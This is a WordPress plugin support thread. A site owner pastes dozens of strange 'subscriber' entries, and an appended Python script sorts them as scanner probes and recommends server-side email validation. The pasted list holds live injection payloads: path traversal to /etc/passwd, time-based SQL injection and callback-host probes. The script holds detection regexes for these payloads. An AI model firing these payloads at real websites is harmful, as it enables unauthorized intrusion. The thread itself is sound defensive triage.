• Resolved

    BitEdge (@whatwhatwhatwhat)

    Hi all,

    Thanks for the great plugin. I tried 5 of the top ranked comment subscription plugins and this was the only one that did not conflict with my theme!

    I just installed the plugin and already on a couple of pages there are dozens of crazy entries in the list of subscribers. Hack attempts like injection attacks and penetration tests. They are pasted below.

    Where do these values come from? Were they submitted as emails in the comments field? And why are they in this list if they were submitted before the plugin was installed, while the real emails of commenters are not in this list? Should I remove them all?

    Thanks

    
     %2fetc%2fpasswd
     '"
     ';print(md5(acunetix_wvs_security_test));$a='
     ";print(md5(acunetix_wvs_security_test));$a="
     (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0
     )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
     -1" OR 2+141-141-1=0+0+0+1 --
     -1" OR 3+141-141-1=0+0+0+1 --
     ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst
     ................windowswin.ini
     ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
     ../../../../../../../../../../../../../../../proc/version
     ../../../../../../../../../../etc/passwd
     ../../../../../../../../../../etc/passwd.tst
     ../../../../../../../../../../windows/win.ini
     ../../../../../../../../../../windows/win.ini.tst
     ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
     ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
     .\./.\./.\./.\./.\./.\./etc/passwd
     /../../../../../../../etc/passwd
     /../..//../..//../..//../..//../..//etc/passwd.tst
     /.././.././.././.././.././.././.././../etc/./passwd%00
     /.\./.\./.\./.\./.\./.\./windows/win.ini
     /etc/passwd
     /WEB-INF/web.xml
     1 waitfor delay '0:0:3' --
     1'"
     164'
     1GHlQH3a');select pg_sleep(6); --
     1some_inexistent_file_with_long_name.tst
     7w8g5ZR5'; waitfor delay '0:0:6' --
     ;print(md5(acunetix_wvs_security_test));
     C:WINDOWSsystem32driversetchosts
     file:///etc/passwd
     https://hitmUVUdNdJvD.bxss.me/
     https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst
     if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=
     index.php
     index.php/.
     invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././
     JyI=
     m3GgSGL5'));select pg_sleep(6); --
     ucEg9ldh';select pg_sleep(6); --
     WEB-INF/web.xml
     WEB-INFweb.xml
     !(()&&!|*|*|
     %2fetc%2fpasswd
     '"
     ';print(md5(acunetix_wvs_security_test));$a='
     ";print(md5(acunetix_wvs_security_test));$a="
     (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0
     )
     )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
     -1 OR 2+294-294-1=0+0+0+1
     -1 OR 2+943-943-1=0+0+0+1 --
     -1' OR 2+427-427-1=0+0+0+1 or 'X90KLkLc'='
     -1' OR 2+735-735-1=0+0+0+1 --
     -1" OR 2+608-608-1=0+0+0+1 --
     ../../../../../../../../../../windows/win.ini
     ../../../../../../../../../../windows/win.ini.tst
     /.././.././.././.././.././.././.././../etc/./passwd%00
     /WEB-INF/web.xml
     1 waitfor delay '0:0:4' --
     1some_inexistent_file_with_long_name.tst
     907'
     ;print(md5(acunetix_wvs_security_test));
     A0HjJyy4';select pg_sleep(8); --
     C:WINDOWSsystem32driversetchosts
     dJ4Thxyt'; waitfor delay '0:0:4' --
     https://hit2AEhkeIVIS.bxss.me/
     https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.tst
     if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=
     index.php
     index.php/.
     nCwJHPtS
     sample%40email.tst
     V5pZQ2J7'));select pg_sleep(8); --
     WEB-INF/web.xml
     WEB-INFweb.xml
     xI5GNEWF');select pg_sleep(8); --
    
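As an added example (not part of the post, and not code from the plugin), here is a Python triage script for the practical question the post asks. Anything that is not a syntactically valid email address can never receive a notification, so it is not a subscriber whatever else it is; the rest of the value usually names the probe family. The `acunetix_wvs_security_test` string is the literal marker the Acunetix web vulnerability scanner plants in form fields, and `some-inexistent-website.acu` and `*.bxss.me` callback hosts belong to the same kind of automated scan, so the whole batch is consistent with one scanner run that filled every field of the comment form. The script assumes the subscriber list has been exported to one entry per line; the sample list is copied from the post above plus one constructed genuine address (`reader@example.com`) for contrast. URL-encoded and base64-encoded values are decoded before matching, so `%2fetc%2fpasswd` and `JyI=` (base64 of `'"`) are still recognised.

```python
"""Triage a comment-subscriber export: separate deliverable addresses from scanner probes."""
import base64
import re
from urllib.parse import unquote

# Constructed sample: entries copied from the list pasted in the post above,
# plus one made-up genuine address (reader@example.com) for contrast.
SAMPLE_ENTRIES = [
    "%2fetc%2fpasswd",
    "'\"",
    "';print(md5(acunetix_wvs_security_test));$a='",
    "(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'\"+(select(0",
    "-1\" OR 2+141-141-1=0+0+0+1 --",
    "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst",
    "../../../../../../../../../../windows/win.ini",
    "/WEB-INF/web.xml",
    "1 waitfor delay '0:0:3' --",
    "1GHlQH3a');select pg_sleep(6); --",
    "C:WINDOWSsystem32driversetchosts",
    "file:///etc/passwd",
    "https://hitmUVUdNdJvD.bxss.me/",
    "if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'\"XOR(if(now()=",
    "!(()&&!|*|*|",
    "sample%40email.tst",
    "JyI=",
    "nCwJHPtS",
    "reader@example.com",
]

# A deliverable address: local part, one @, a dotted domain with an alphabetic TLD.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Ordered signature rules; first match wins. Each is a loose pattern for a
# probe family that vulnerability scanners submit into every form field.
RULES = [
    ("scanner-marker", re.compile(
        r"acunetix_wvs_security_test|\.bxss\.me|some-inexistent-website\.acu|some_inexistent_file", re.I)),
    ("path-traversal", re.compile(
        r"\.\.[\\/]|/etc/passwd|windows.?win\.ini|proc/version|WEB-INF|windows.?system32|^file:///", re.I)),
    ("sql-injection", re.compile(
        r"sleep\(\d+\)|pg_sleep\(|waitfor\s+delay|\bOR\s+\d+\+\d+", re.I)),
    ("ldap-injection", re.compile(r"^[!()&|*]{6,}$")),
    ("quote-probe", re.compile(r"^\d*['\"]+$")),
]


def _decodings(entry):
    """Yield the raw entry and cheap decodings of it (URL, base64) so that
    encoded probes such as %2fetc%2fpasswd or JyI= are still recognised."""
    yield entry
    decoded = unquote(entry)
    if decoded != entry:
        yield decoded
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", entry) and len(entry) % 4 == 0:
        try:
            yield base64.b64decode(entry, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            pass  # not base64, or decodes to non-text: nothing to learn from it


def classify(entry):
    """Return 'email' for a deliverable address, a probe-family label for a
    recognised scanner payload, or 'unrecognized' for anything else."""
    entry = entry.strip()
    if EMAIL_RE.match(entry):
        return "email"
    for candidate in _decodings(entry):
        for label, pattern in RULES:
            if pattern.search(candidate):
                return label
    return "unrecognized"


def triage(entries):
    """Group entries by classification label, preserving input order."""
    buckets = {}
    for entry in entries:
        buckets.setdefault(classify(entry), []).append(entry.strip())
    return buckets


def removable(entries):
    """Every entry that is not a valid address: none of these can be notified,
    so all are safe to delete regardless of which probe family they belong to."""
    return [e.strip() for e in entries if classify(e) != "email"]


if __name__ == "__main__":
    for label, items in sorted(triage(SAMPLE_ENTRIES).items()):
        print(f"{label} ({len(items)})")
        for item in items:
            print("   ", item)
```

The labels are triage hints, not an input filter: a match tells you what the scanner was testing for, and the `unrecognized` bucket (random tokens such as `nCwJHPtS`, or `sample%40email.tst`, which only becomes an address after decoding) is the one to look at by hand. The durable fix on the plugin side is to validate the field as an email address on the server before storing it, so that arbitrary form input never reaches the subscriber table in the first place.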
Viewing 1 replies (of 1 total)
  • The topic ‘Bizarre list of subscribers’ is closed to new replies.